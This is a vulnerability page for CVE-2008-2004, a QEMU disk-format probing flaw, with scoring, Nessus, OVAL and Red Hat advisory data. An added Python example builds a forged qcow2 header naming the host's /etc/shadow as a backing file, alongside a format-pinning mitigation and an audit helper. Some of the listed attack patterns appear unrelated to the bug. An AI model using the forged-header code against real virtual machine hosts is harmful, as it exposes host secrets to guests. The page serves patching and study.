CVE-2008-2004 - Information Exposure vulnerability in QEMU 0.9.1

CVSS v2 base score: 4.9 - MEDIUM (AV:L/AC:L/Au:N/C:C/I:N/A:N)
Attack vector: LOCAL
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: COMPLETE
Integrity impact: NONE
Availability impact: NONE
Tags: local, low complexity, qemu, CWE-200, nessus

Summary

The drive_init function in QEMU 0.9.1 determines the format of a disk image by probing the image header rather than trusting a configured format. A guest that can write to its own raw disk can overwrite the first sectors with the header of a different format, such as a qcow2 header whose backing-file field names a file on the host; when the guest is restarted, QEMU re-probes the image, opens it as that format, and the guest can then read the named host file through the image. Only images attached without an explicit format are affected (for example -drive file=disk.img with no format= parameter, or the legacy -hda style options); pinning the format with format=raw removes the probe.
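The header-probing behaviour described above, and the effect of pinning the format, as an added Python example that is not code from this page or from QEMU. The probe functions are a simplified re-implementation of QEMU's block-driver scoring (qcow2 scores 100 on a magic/version match, raw always scores 1, highest score wins); the qcow2 version-2 header layout is the real on-disk format. The host path /etc/shadow, the 1 MiB image and the sample command lines are constructed for illustration, and find_unpinned_drives is an audit helper written for this example, not a QEMU tool.

```python
import struct

# qcow2 version-2 header, big-endian: magic, version, backing_file_offset,
# backing_file_size, cluster_bits, size, crypt_method, l1_size,
# l1_table_offset, refcount_table_offset, refcount_table_clusters,
# nb_snapshots, snapshots_offset
QCOW_MAGIC = 0x514649FB            # the bytes b"QFI\xfb"
QCOW2_HEADER = ">IIQIIQIIQQIIQ"
QCOW2_HEADER_LEN = struct.calcsize(QCOW2_HEADER)   # 72 bytes


def qcow2_probe(buf):
    """Simplified qcow2 probe: QEMU returns score 100 on magic + version match."""
    if len(buf) < QCOW2_HEADER_LEN:
        return 0
    magic, version = struct.unpack_from(">II", buf, 0)
    return 100 if magic == QCOW_MAGIC and version >= 2 else 0


def raw_probe(buf):
    """The raw driver accepts anything, with a minimal score of 1."""
    return 1


PROBES = {"qcow2": qcow2_probe, "raw": raw_probe}


def autodetect_format(buf):
    """drive_init()-style behaviour: the driver with the highest probe score wins."""
    return max(PROBES, key=lambda name: PROBES[name](buf))


def qcow2_backing_file(buf):
    """Return the backing-file path named in a qcow2 header, or None."""
    fields = struct.unpack_from(QCOW2_HEADER, buf, 0)
    offset, size = fields[2], fields[3]
    if size == 0:
        return None
    return buf[offset:offset + size].decode("ascii", "replace")


def forge_qcow2_header(backing_path, virtual_size):
    """Bytes a guest could write to sector 0 of its own raw disk: a qcow2 header
    whose backing file points at a host path (constructed for this example)."""
    name = backing_path.encode()
    header = struct.pack(
        QCOW2_HEADER,
        QCOW_MAGIC, 2,
        QCOW2_HEADER_LEN, len(name),   # backing-file string placed right after the header
        16,                            # cluster_bits: 64 KiB clusters
        virtual_size,
        0, 0, 0, 0, 0, 0, 0)
    return header + name


def build_tampered_disk(backing_path, disk_size=1 << 20):
    """A constructed 1 MiB zero-filled raw image after the guest has written
    the forged header over its first sectors."""
    disk = bytearray(disk_size)
    forged = forge_qcow2_header(backing_path, disk_size)
    disk[:len(forged)] = forged
    return bytes(disk)


def open_drive(image, fmt=None):
    """Model of what happens at guest restart. Returns (format used, host file
    that would be opened as backing store, or None). With fmt=None the header
    is probed, which is the CVE-2008-2004 behaviour; fmt="raw" pins the format
    so the forged header is treated as ordinary guest data."""
    if fmt is None:
        fmt = autodetect_format(image)
    backing = qcow2_backing_file(image) if fmt == "qcow2" else None
    return fmt, backing


def find_unpinned_drives(argv):
    """Audit helper (assumption of this example): flag -drive options with no
    format=, and legacy -hdX/-cdrom/-fdX arguments, which always auto-detect."""
    legacy = {"-hda", "-hdb", "-hdc", "-hdd", "-cdrom", "-fda", "-fdb"}
    flagged = []
    for i, tok in enumerate(argv[:-1]):
        if tok == "-drive":
            opts = argv[i + 1]
            if not any(o.startswith("format=") for o in opts.split(",")):
                flagged.append(opts)
        elif tok in legacy:
            flagged.append(f"{tok} {argv[i + 1]}")
    return flagged


if __name__ == "__main__":
    disk = build_tampered_disk("/etc/shadow")
    print(open_drive(disk))          # ('qcow2', '/etc/shadow'): host file exposed to the guest
    print(open_drive(disk, "raw"))   # ('raw', None): format pinned, header is just guest data
    print(find_unpinned_drives(["qemu", "-drive", "file=vm.img,if=virtio",
                                "-drive", "file=vm2.img,if=virtio,format=raw"]))
```

In a real QEMU of that vintage, the qcow2 driver would open the backing file on the host and serve its contents for every cluster the guest has not yet written, which is how a host file ends up readable from inside the guest. The audit helper only looks at command lines; for images already on disk, qemu-img info on the file shows which format the probe would pick.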

Vulnerable Configurations

Part         Description   Count
Application  Qemu          1

Common Weakness Enumeration (CWE)

CWE-200: Information Exposure

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Subverting Environment Variable Values
    The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker's goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.
  • Footprinting
    An attacker engages in probing and exploration activity to identify constituents and properties of the target. Footprinting is a general term to describe a variety of information gathering techniques, often used by attackers in preparation for some attack. It consists of using tools to learn as much as possible about the composition, configuration, and security mechanisms of the targeted application, system or network. Information that might be collected during a footprinting effort could include open ports, applications and their versions, network topology, and similar information. While footprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.
  • Exploiting Trust in Client (aka Make the Client Invisible)
    An attack of this type exploits a program's vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by placing themselves in the communication channel between client and server such that communication directly to the server is possible where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
  • Browser Fingerprinting
    An attacker carefully crafts small snippets of JavaScript to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser, including the version of the browser, to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero-day weaknesses in the type and version of the browser used by the victim. Automating this process via JavaScript as part of the same delivery system used to exploit the browser is considered more efficient, as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in JavaScript and in response to the same web page request by the browser.
  • Session Credential Falsification through Prediction
    This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.

Nessus

  • NASL family: OracleVM Local Security Checks
    NASL id: ORACLEVM_OVMSA-2008-2003.NASL
    description: The remote OracleVM system is missing necessary patches to address critical security updates :
      - Disable QEMU image format auto-detection (CVE-2008-2004)
      - Fix PVFB to validate frame buffer description
      - Fix PVFB to cope with bogus update requests
      - Fix QEMU buffer overflow (CVE-2007-5730)
      - Fix QEMU block device extents checking (CVE-2008-0928)
      - Fix FV O_DIRECT flushing
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 79446
    published: 2014-11-26
    reporter: This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/79446
    title: OracleVM 2.1 : xen (OVMSA-2008-2003)
  • NASL family: CentOS Local Security Checks
    NASL id: CENTOS_RHSA-2008-0194.NASL
    description: Updated xen packages that fix several security issues and a bug are now available for Red Hat Enterprise Linux 5. This update has been rated as having important security impact by the Red Hat Security Response Team. The xen packages contain tools for managing the virtual machine monitor in Red Hat Virtualization. These updated packages fix the following security issues : Daniel P. Berrange discovered that the hypervisor
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 43678
    published: 2010-01-06
    reporter: This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/43678
    title: CentOS 5 : xen (CESA-2008:0194)
  • NASL family: Ubuntu Local Security Checks
    NASL id: UBUNTU_USN-776-2.NASL
    description: USN-776-1 fixed vulnerabilities in KVM. Due to an incorrect fix, a regression was introduced in Ubuntu 8.04 LTS that caused KVM to fail to boot virtual machines started via libvirt. This update fixes the problem. We apologize for the inconvenience. Avi Kivity discovered that KVM did not correctly handle certain disk formats. A local attacker could attach a malicious partition that would allow the guest VM to read files on the VM host. (CVE-2008-1945, CVE-2008-2004) Alfredo Ortega discovered that KVM
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 38777
    published: 2009-05-14
    reporter: Ubuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/38777
    title: Ubuntu 8.04 LTS : kvm regression (USN-776-2)
  • NASL family: FreeBSD Local Security Checks
    NASL id: FREEBSD_PKG_8950AC621D3011DD93880211060005DF.NASL
    description: Secunia reports : A vulnerability has been reported in QEMU, which can be exploited by malicious, local users to bypass certain security restrictions. The vulnerability is caused due to the
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 32147
    published: 2008-05-09
    reporter: This script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/32147
    title: FreeBSD : qemu -- 'drive_init()' Disk Format Security Bypass (8950ac62-1d30-11dd-9388-0211060005df)
  • NASL family: Scientific Linux Local Security Checks
    NASL id: SL_20080513_XEN_ON_SL5_X.NASL
    description: Note: Troy Dawson has tested this update on a machine hosting both paravirtualized and fully virtualized machines, both 32 bit and 64 bit. He did the update while all the machines were running; none of them had any problems. He also tried stopping, starting, and rebooting several of the machines, all without any problems. We tell you this because updating the xen package while running virtual machines can make you a little nervous. These updated packages fix the following security issues : Daniel P. Berrange discovered that the hypervisor
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 60398
    published: 2012-08-01
    reporter: This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/60398
    title: Scientific Linux Security Update : xen on SL5.x i386/x86_64
  • NASL family: Mandriva Local Security Checks
    NASL id: MANDRIVA_MDVSA-2008-162.NASL
    description: Multiple vulnerabilities have been found in Qemu.
      Multiple heap-based buffer overflows in the cirrus_invalidate_region function in the Cirrus VGA extension in QEMU 0.8.2, as used in Xen and possibly other products, might allow local users to execute arbitrary code via unspecified vectors related to attempting to mark non-existent regions as dirty, aka the bitblt heap overflow. (CVE-2007-1320)
      Integer signedness error in the NE2000 emulator in QEMU 0.8.2, as used in Xen and possibly other products, allows local users to trigger a heap-based buffer overflow via certain register values that bypass sanity checks, aka QEMU NE2000 receive integer signedness error. (CVE-2007-1321)
      QEMU 0.8.2 allows local users to halt a virtual machine by executing the icebp instruction. (CVE-2007-1322)
      QEMU 0.8.2 allows local users to crash a virtual machine via the divisor operand to the aam instruction, as demonstrated by aam 0x0, which triggers a divide-by-zero error. (CVE-2007-1366)
      The NE2000 emulator in QEMU 0.8.2 allows local users to execute arbitrary code by writing Ethernet frames with a size larger than the MTU to the EN0_TCNT register, which triggers a heap-based buffer overflow in the slirp library, aka NE2000 mtu heap overflow. (CVE-2007-5729)
      Heap-based buffer overflow in QEMU 0.8.2, as used in Xen and possibly other products, allows local users to execute arbitrary code via crafted data in the net socket listen option, aka QEMU net socket heap overflow. (CVE-2007-5730)
      QEMU 0.9.0 allows local users of a Windows XP SP2 guest operating system to overwrite the TranslationBlock (code_gen_buffer) buffer, and probably have unspecified other impacts related to an overflow, via certain Windows executable programs, as demonstrated by qemu-dos.com. (CVE-2007-6227)
      Qemu 0.9.1 and earlier does not perform range checks for block device read or write requests, which allows guest host users with root privileges to access arbitrary memory and escape the virtual machine. (CVE-2008-0928)
      Changing removable media in QEMU could trigger a bug similar to CVE-2008-2004, which would allow local guest users to read arbitrary files on the host by modifying the header of the image to identify a different format. (CVE-2008-1945) See the diskformat: parameter to the -usbdevice option.
      The drive_init function in QEMU 0.9.1 determines the format of a raw disk image based on the header, which allows local guest users to read arbitrary files on the host by modifying the header to identify a different format, which is used when the guest is restarted. (CVE-2008-2004) See the -format option.
      The updated packages have been patched to fix these issues.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 37509
    published: 2009-04-23
    reporter: This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/37509
    title: Mandriva Linux Security Advisory : qemu (MDVSA-2008:162)
  • NASL family: Red Hat Local Security Checks
    NASL id: REDHAT-RHSA-2008-0194.NASL
    description: Updated xen packages that fix several security issues and a bug are now available for Red Hat Enterprise Linux 5. This update has been rated as having important security impact by the Red Hat Security Response Team. The xen packages contain tools for managing the virtual machine monitor in Red Hat Virtualization. These updated packages fix the following security issues : Daniel P. Berrange discovered that the hypervisor
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 32354
    published: 2008-05-16
    reporter: This script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/32354
    title: RHEL 5 : xen (RHSA-2008:0194)
  • NASL family: Ubuntu Local Security Checks
    NASL id: UBUNTU_USN-776-1.NASL
    description: Avi Kivity discovered that KVM did not correctly handle certain disk formats. A local attacker could attach a malicious partition that would allow the guest VM to read files on the VM host. (CVE-2008-1945, CVE-2008-2004) Alfredo Ortega discovered that KVM
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 38759
    published: 2009-05-13
    reporter: Ubuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/38759
    title: Ubuntu 8.04 LTS / 8.10 : kvm vulnerabilities (USN-776-1)
  • NASL family: SuSE Local Security Checks
    NASL id: SUSE_QEMU-5270.NASL
    description: Local attackers could use raw formatted disk images to access the hosting environment. CVE-2008-2004 has been assigned to this issue.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 33163
    published: 2008-06-12
    reporter: This script is Copyright (C) 2008-2019 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/33163
    title: openSUSE 10 Security Update : qemu (qemu-5270)
  • NASL family: Oracle Linux Local Security Checks
    NASL id: ORACLELINUX_ELSA-2008-0194.NASL
    description: From Red Hat Security Advisory 2008:0194 : Updated xen packages that fix several security issues and a bug are now available for Red Hat Enterprise Linux 5. This update has been rated as having important security impact by the Red Hat Security Response Team. The xen packages contain tools for managing the virtual machine monitor in Red Hat Virtualization. These updated packages fix the following security issues : Daniel P. Berrange discovered that the hypervisor
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 67671
    published: 2013-07-12
    reporter: This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/67671
    title: Oracle Linux 5 : xen (ELSA-2008-0194)

Oval

accepted: 2013-04-29T04:10:49.864-04:00
class: vulnerability
contributors:
  • name: Aharon Chernin
    organization: SCAP.com, LLC
  • name: Dragos Prisaca
    organization: G2, Inc.
definition_extensions:
  • comment: The operating system installed on the system is Red Hat Enterprise Linux 5
    oval: oval:org.mitre.oval:def:11414
  • comment: The operating system installed on the system is CentOS Linux 5.x
    oval: oval:org.mitre.oval:def:15802
  • comment: Oracle Linux 5.x
    oval: oval:org.mitre.oval:def:15459
description: The drive_init function in QEMU 0.9.1 determines the format of a raw disk image based on the header, which allows local guest users to read arbitrary files on the host by modifying the header to identify a different format, which is used when the guest is restarted.
family: unix
id: oval:org.mitre.oval:def:11021
status: accepted
submitted: 2010-07-09T03:56:16-04:00
title: The drive_init function in QEMU 0.9.1 determines the format of a raw disk image based on the header, which allows local guest users to read arbitrary files on the host by modifying the header to identify a different format, which is used when the guest is restarted.
version: 18

Redhat

advisories
bugzilla
id: 444583
title: CVE-2008-2004 qemu/kvm/xen: qemu block format auto-detection vulnerability
oval
OR
  • comment: Red Hat Enterprise Linux must be installed
    oval: oval:com.redhat.rhba:tst:20070304026
  • AND
    • comment: Red Hat Enterprise Linux 5 is installed
      oval: oval:com.redhat.rhba:tst:20070331005
    • OR
      • AND
        • comment: xen-libs is earlier than 0:3.0.3-41.el5_1.5
          oval: oval:com.redhat.rhsa:tst:20080194001
        • comment: xen-libs is signed with Red Hat redhatrelease key
          oval: oval:com.redhat.rhsa:tst:20070114002
      • AND
        • comment: xen is earlier than 0:3.0.3-41.el5_1.5
          oval: oval:com.redhat.rhsa:tst:20080194003
        • comment: xen is signed with Red Hat redhatrelease key
          oval: oval:com.redhat.rhsa:tst:20070114004
      • AND
        • comment: xen-devel is earlier than 0:3.0.3-41.el5_1.5
          oval: oval:com.redhat.rhsa:tst:20080194005
        • comment: xen-devel is signed with Red Hat redhatrelease key
          oval: oval:com.redhat.rhsa:tst:20070114006
rhsa
id: RHSA-2008:0194
released: 2008-05-13
severity: Important
title: RHSA-2008:0194: xen security and bug fix update (Important)
rpms
  • xen-0:3.0.3-41.el5_1.5
  • xen-debuginfo-0:3.0.3-41.el5_1.5
  • xen-devel-0:3.0.3-41.el5_1.5
  • xen-libs-0:3.0.3-41.el5_1.5